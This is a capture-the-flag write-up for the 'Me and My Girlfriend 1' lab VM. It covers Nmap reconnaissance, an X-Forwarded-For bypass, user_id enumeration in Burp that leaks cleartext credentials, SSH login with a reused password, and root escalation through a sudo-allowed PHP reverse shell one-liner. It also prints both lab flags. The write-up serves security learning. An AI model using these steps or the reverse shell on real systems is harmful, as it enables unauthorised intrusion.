Lab Solution: Me and My Girlfriend 1

January 5, 2020

Machine Link:,409/#

Machine Author: TW1C3 (@makegreatagain_)

Description (as given by the machine author):

This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!

Level: Beginner

# of Flags: 2

Machine Published Date: 13-Dec-2019

The Solution:

It had been a while that I had spoilt my hands on any lab machines. I was browsing through, I came across this interesting machine and thought of solving it. I took the following steps in capturing both the flags.

Since I knew the MAC address of the machine (00:0C:29:97:56:3F), and I knew the IP range of the NAT interface (, I ran the below Nmap scan to obtain the IP address of the machine and the open ports.

nmap -sS -p 21,22,23,80,443
MAC Address of the VM
MAC Address of the Virtual Machine
Nmap Scan output – IP address of the VM and open ports

From the Nmap output, it was known that the IP address assigned to the virtual machine was and ports TCP/22 and TCP/80 were open. This implies that the server was hosting a web application and SSH was being used for remote administration of the machine.

Now we browse the application on the browser and we encounter an interesting message on the webpage that says “Who are you? Hacker? Sorry This Site Can Only Be Accessed local!”

Application error message

To dig further into this, I intercepted the request and response in Burp and found another interesting comment appended to this line in the HTML code. The comment said “<!– Maybe you can search how to use x-forwarded-for –>”.

Default Request for the application
The default response of the application containing the comment for the hint

Now I started adding X-Forwarded-For: in each of my request and the application started working.

Added X-Forwarded-For: in each request
Application working – We are now on the home page of the application

Now we see a registration option on the application. This is the easiest way to gain access to the application. I registered myself to the application and proceeded for login.

Registration Form
Login Page
Successful Login – Post Login Page Response

After successful login, there were 3 available options – Dashboard (current page), Profile, and Logout. So my next probable choice was to go for the Profile section. In the profile page, URL had a parameter user_id which had a value of 12. I moved the request to Intruder in the Burp and passed sequential values from 1 – 15 as payload and observed that different values of user_id gave information about the other users including their clear text credentials.

User_id parameter had a value of 12. Send the request to Intruder.
Intruder Payload Position – user_id parameter
Intruder Payload Configuration
Intruder payload value 5 – Request
User ID corresponds to Alice’s profile which reveals her credentials.

Analyzing the responses in the intruder, I observed that the user_id 5 corresponds to Alice’s profile. Alice’s credentials were username as ‘alice’ and password as ‘4lic3’.

Assuming Alice uses the same credentials for all her login, I tried my luck on the SSH port that was open on the server. The credentials worked and now I have the access of the server. Looking for Alice’s directories especially the hidden ones, I ran ls -a command. Another interesting find. A directory named ‘.my_secret’ was present in Alice’s home folder. Navigating to the directory and listing the files, I found two files – my_notes.txt and flag1.txt.

SSH access on the virtual machine

Using cat command, I read both the files and found the first flag and hint for the next one.

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Flag 1 captured

Now to gain the root-level access first, I ran sudo su - as the basic option, but it didn’t work out. Then I moved on to check what sudo permissions does Alice have. I found that she has NOPASSWD permission to run PHP files as a root user.

Alice can run PHP as root

To exploit this misconfiguration, I hosted a Netcat listener on my system on port 1234 and ran the following command from Alice’s login. I got a reverse root shell on my Netcat listener.

sudo php -r '$sock=fsockopen("", 1234); exec("/bin/sh -i <&3 >&3 2>&3");'
Reverse Shell on Attacker’s machine with root-level access

Navigating to /root directory and listing all the files, I get only one file – flag2.txt. Using the cat command, I read the flag2.txt file. I captured the second and the final flag.

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
Flag 2 captured.

I hope you liked the blog and this will be helpful while you solve this machine. New learning for me in this machine was to use PHP to get a reverse shell connection. I had learnt these techniques earlier but never had a chance to use it.

Lastly, I would like to thank the author of this machine for his dedication and efforts that he had put into creating this machine. Cheers TW1C3!!!